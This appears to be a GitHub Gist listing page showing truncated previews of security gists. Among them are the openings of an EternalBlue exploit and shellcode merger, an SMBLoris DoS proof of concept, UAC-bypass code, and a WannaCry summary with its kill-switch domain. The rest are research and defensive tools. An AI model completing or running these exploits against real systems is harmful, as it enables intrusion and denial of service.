@Proteas
Proteas / xnu-4570.1.46-arm64-steps.txt
Created October 9, 2017 02:46
steps to build arm64 version of xnu-4570.1.46
Following are my steps to build the ARM64 version of xnu-4570.1.46, hope this is helpful for saving time.
1. Use Xcode 9.0
2. Preparation is same as macOS, and there is a guide: https://0xcc.re/building-xnu-kernel-macosx-sierrra-10-12-x/
3. There is an ARM64 version libfirehose: https://github.com/Proteas/install_firehose_lib
4. Copy and edit the ARM64 config(CFLAGS, LDFLAGS) from darwin-on-arm/xnu to your target project
5. Example CFLAGS: -Darm64 -DARM64 -D__arm64__ -D__ARM64__ -DLP64 -DCONFIG_EMBEDDED -mkernel -DARM64_BOARD_CONFIG_T8011=1
6. Fix compiling stage errors by directly importing the missing headers or editing the code
7. Fix linking stage errors by implementing placeholder functions for: chudxnu_cpu_alloc, etc
8. If missing symbol __divti3 in linking stage, get the runtime from llvm.
@williballenthin
williballenthin / stackstrings.yara
Last active March 12, 2025 07:04
match x86 that appears to be stack string creation
rule stack_strings
{
    meta:
        author = "William Ballenthin"
        email = "[email protected]"
        license = "Apache 2.0"
        copyright = "FireEye, Inc"
        description = "Match x86 that appears to be stack string creation."
    strings:
@marcan
marcan / smbloris.c
Last active November 22, 2022 08:32
SMBLoris attack proof of concept
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block
@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@hfiref0x
hfiref0x / gist:59c689a14f1fc2302d858ae0aa3f6b86
Created May 27, 2017 06:30
CIA Stinger UAC bypass (likely)
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
@worawit
worawit / eternalblue7_exploit.py
Last active November 1, 2024 23:12
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@skochinsky
skochinsky / rich.py
Created April 13, 2017 13:03
MSVC PE Rich header parser with compiler version display
# based on code from http://trendystephen.blogspot.be/2008/01/rich-header.html
import sys
import struct
# I'm trying not to bury the magic number...
CHECKSUM_MASK = 0x536e6144 # DanS (actually SnaD)
RICH_TEXT = 'Rich'
RICH_TEXT_LENGTH = len(RICH_TEXT)
PE_START = 0x3c
PE_FIELD_LENGTH = 4
@ChiChou
ChiChou / iOS-checksec.py
Last active March 8, 2023 02:30
checksec for iOS executables based on lief
#!/usr/bin/env python3
import struct
import lief
from lief.MachO import LOAD_COMMAND_TYPES, HEADER_FLAGS
def check(filename):
    macho = lief.parse(filename)
    # check this?